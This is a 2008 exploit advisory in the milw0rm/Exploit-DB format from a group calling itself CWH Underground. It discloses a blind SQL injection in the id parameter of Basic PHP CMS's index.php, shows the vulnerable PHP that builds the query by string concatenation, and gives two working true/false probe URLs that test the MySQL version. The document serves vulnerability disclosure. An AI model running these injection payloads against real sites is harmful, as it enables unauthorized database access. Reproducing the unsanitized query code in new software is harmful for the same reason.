Basic-CMS - Blind SQL Injection

EDB-ID:

7261

CVE:





Platform:

PHP

Date:

2008-11-28


==================================================================
  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Basic PHP CMS
 DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
#####################################################

--- Blind SQL Injection ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

if ($strID != "")
{
	$strsql = "SELECT description ";
	$strsql .=" FROM pages_t_details ";
	$strsql .=" WHERE id=$strID";
	$conclass =new DataBase();
	$rst= $conclass->Execute ($strsql,$strError);
	if ($strError=="")
	{
		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) 
	     {
			$strDetails=$line['description'];
		}
	}
	
}

---------
 Exploit
---------

Test Blind SQL Injection in MYSQL Version 5

True
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--

False
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-28]